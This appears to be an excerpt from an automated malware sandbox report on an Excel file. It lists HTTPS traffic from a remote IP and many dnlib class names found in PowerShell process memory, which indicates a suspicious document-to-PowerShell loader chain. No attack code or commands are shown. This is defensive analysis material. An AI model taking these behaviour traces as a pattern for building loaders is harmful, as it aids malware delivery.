                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000010.00000002.486432226.0000000002260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.486203439.0000000000329000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000010.00000002.486432226.0000000002260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.486203439.0000000000329000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
